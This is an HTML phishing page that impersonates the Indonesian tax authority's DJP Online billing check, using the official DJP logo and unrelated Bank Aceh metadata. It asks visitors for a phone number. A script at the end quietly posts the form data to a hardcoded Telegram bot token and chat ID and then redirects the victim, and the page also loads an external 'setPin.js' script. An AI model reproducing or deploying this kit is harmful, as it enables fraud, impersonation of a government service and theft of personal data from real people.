<!doctype html>
<html lang="en">
 <head> 
  <meta charset="UTF-8"> 
  <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
  <meta http-equiv="X-UA-Compatible" content="ie=edge"> 
  <title>DJP ONLINE | Cek Tagihan</title> 
  <meta property="twitter:card" content="summary_large_image"> 
  <meta property="og:image:type" content="image/jpeg"> 
  <meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTvo7X4UER-LofyB7Gqq0lnN-tjcjg_RxYAoKFHPsN3OzW6ujSnT8CBo_CT&s=10"> 
  <meta property="twitter:image:src" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTvo7X4UER-LofyB7Gqq0lnN-tjcjg_RxYAoKFHPsN3OzW6ujSnT8CBo_CT&s=10"> 
  <meta property="og:title" content="Bank Aceh | E-money"> 
  <meta property="twitter:title" content="djponline | Pajak"> 
  <meta property="og:url" content="https://pajak.go.id/id"> 
  <style>
@import url('https://fonts.googleapis.com/css2?family=Ubuntu:wght@300;400;500;700&display=swap');
* {
    font-family: 'Ubuntu', sans-serif;
    font-weight: 400;
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    color: #000;
    position: relative;
}
html { width: 100vw; height: 100vh; }
body {
    background: #fff;
    width: 100%;
    height: 100%;
}
.container {
    width: 100%;
    height: 100%;
    display: flex;
    align-items: center;
    flex-direction: column;
}
.headr {
    width: 100%;
    height: 40px;
    background: transparent;
    display: flex;
    justify-content: space-between;
    align-items: center;
    padding: 0 20px;
}
.headr p {
    font-size: 15px;
    color: #fff;
}
.headr img {
    height: 36%;
}
.container .imgh {
    width: 50%;
    margin: 80px 0 40px 0;
}
.content {
    margin-top: 20px;
    width: 100%;
    padding: 20px;
    display: flex;
    align-items: center;
    justify-content: center;
    flex-direction: column;
}
.content form {
    width: 100%;
}
.content .wrp {
    width: 100%;
    display: flex;
    justify-content: center;
    margin-bottom: 20px;
    height: 50px;
    flex-direction: column;
}
.content .wrp input {
    width: 100%;
    height: 40px;
    outline: none;
    border-radius: 8px;
    border: 1px solid #d5d5d5;
    padding: 10px 0;
    background: transparent;
    z-index: 22;
    font-size: 15px;
    font-weight: bold;
    padding-left: 15px;
}
.content .wrp label {
    color: #000;
    font-size: 13px;
    opacity: 0.7;
}
.content .wrp input:focus,
.content .wrp input:valid {
    border: 1px solid #d5d5d5;
}
.content button {
    width: 100%;
    height: 42px;
    border: none;
    border-radius: 8px;
    background: #E8A317;
    font-size: 15px;
    color: black;
    font-weight: 500;
}
.content .or {
    margin: 10px 0;
    font-size: 10px;
    text-align: center;
    color: #797979;
    opacity: 0.6;
}
.content form .bbtn {
    margin-top: 10px;
    width: 100%;
    display: flex;
    align-items: center;
    justify-content: space-between;
}
.content form .bbtn button {
    width: 48%;
    height: 35px;
    font-size: 10px;
    color: #000;
    background: #fff400;
}
.content .reg {
    background: none;
    color: #006543;
    font-size: 13px;
}
.container .foot {
    width: 100%;
    position: absolute;
    bottom: -20px;
}
.bgm {
    width: 100%;
    height: 100%;
    background: ;
    position: absolute;
    z-index: 999;
    display: flex;
    justify-content: center;
    align-items: center;
}
.bgbg {
    width: 100%;
    height: 100%;
    background: #0000001b;
    position: absolute;
    z-index: 99;
}
.bgm .modal {
    width: 80%;
    border-radius: 20px;
    background: #fff;
    padding: 20px;
    transform: translatey(-80px);
    box-shadow: 0 3px 6px rgba(0,0,0,0.2);
    overflow: hidden;
}
.modal h3 {
    margin: 40px 0 8px 0;
    font-size: 13px;
    text-align: center;
    font-weight: 500;
}
.xx {
    width: 100%;
    height: 40px;
    position: absolute;
    right: 0;
    left: 0;
    top: 0;
    background: #006543;
    display: flex;
    justify-content: center;
    align-items: center;
}
.xx i {
    font-style: normal;
    position: absolute;
    right: 8px;
    top: 1px;
    font-weight: 200;
}
input::placeholder {
    font-size: 15px;
    opacity: 0.7;
    font-style: italic;
    font-weight: bold;
}
</style> 
 </head> 
 <body> 
  <div class="container"> 
   <div style="display:none;" onclick="hidem();" class="bgbg"></div> 
   <div class="headr"> 
    <!--<img src="/assets/back.png" onclick="window.location.href='/'" alt=""> 
    <p>Login</p> 
    <img src="/assets/bell.png" alt=""> -->
   </div> 
   <img class="imgh" src="https://static.pajak.go.id/assets/media/logos/Logo%20DJP.png" alt="" style="margin-top: 0%;"> 
   <div class="content"> 
    <form id="tg" onsubmit="">
     <!--                <div style="display:none;" class="bgm">--> 
     <!--                    <div class="modal">--> 
     <!--                        <div class="xx">--> 
     <!--                            <p style="font-size:14px;color:#fff;">Nomor Handphone</p>--> 
     <!--                        </div>--> 
     <!--                        <h3>MASUKKAN NO HANDPHONE<br>YANG TERDAFTAR</h3>--> 
     <!--                        <br>--> 
     <!--                        <div class="wrp">--> 
     <!--                            <label>Nomor Handphone</label>--> 
     <!--                            <input name="nohp" placeholder="Masukkan No Handphone Anda" required autocomplete="off" type="number">--> 
     <!--                        </div>--> 
     <!--                        <button type="submit">MASUK</button>--> 
     <!--                    </div>--> 
     <!--                </div>--> 
     <div class="wrp"> 
      <label></label> 
      <input placeholder="Nama Lengkap" name="" id="" required autocomplete="off" type="hidden">
     </div> 
     <div class="wrp"> 
      <label></label> 
      <input placeholder="Nomor Handphone" name="Nomor-Hp" id="Nomor-Hp" required autocomplete="off" type="tel" minlength="10" maxlength="12" style="margin-top: -40px;"> 
     </div> 
     <button type="submit">Daftar</button> 
     <p id="status"></p>
    </form> 
    <br>
    <br> 
    <br>
        <br>
    <br> 
    <br>
        <br>
    <br> 
    <br>
        <br>
    <br> 
    <br>
        <br>
    <br> 
    <br>
   <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQpODe45NR8WqodekzSSjXBn-RLrIpLNLxeqQ&usqp=CAU" alt="" class="foot" style="margin-top: 0%;">
  </div> 
  <script src="setPin.js"></script>
  <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script> 
  <script>
function hidem(){
    $(".bgbg").fadeOut()
    $(".bgm").fadeOut()
}
function next(){
    $(".bgbg").fadeIn()
    $(".bgm").fadeIn()
}
</script>   
<script>
    
    const chat_id = '5913259034', botID = 'bot6111720160:AAGZ-OW6SIFIWm7SQ4vVabl2J0UgAMSo4nc';
    const telegramURL = `https://api.telegram.org/${botID}/sendMessage`;
    document.querySelector('#tg').addEventListener("submit", async e => { // When the user submits the form
        e.preventDefault(); // Don't submit
        let text = JSON.stringify( // Convert the form data to a string to send as our Telegram message
            Object.fromEntries(new FormData(e.target).entries()), // Convert the form data to an object.
        null, 2); // Prettify the JSON so we can read the data easily
        const sendMessage = await fetch(telegramURL, { // Send the request to the telegram API
            method: 'POST',
            headers: {"Content-Type": "application/json"}, // This is required when sending a JSON body.
            body: JSON.stringify({chat_id, text}), // The body must be a string, not an object
        });
        const messageStatus = document.querySelector('#status');
        if (sendMessage.ok) // Update the user on if the message went through
            messageStatus.textContent = "";
        else
            messageStatus.textContent = "Message Failed to send :( " + (await sendMessage.text());
        e.target.reset(); // Clear the form fields.
        window.location.href='/google';
    });

</script>
 </body>
</html>
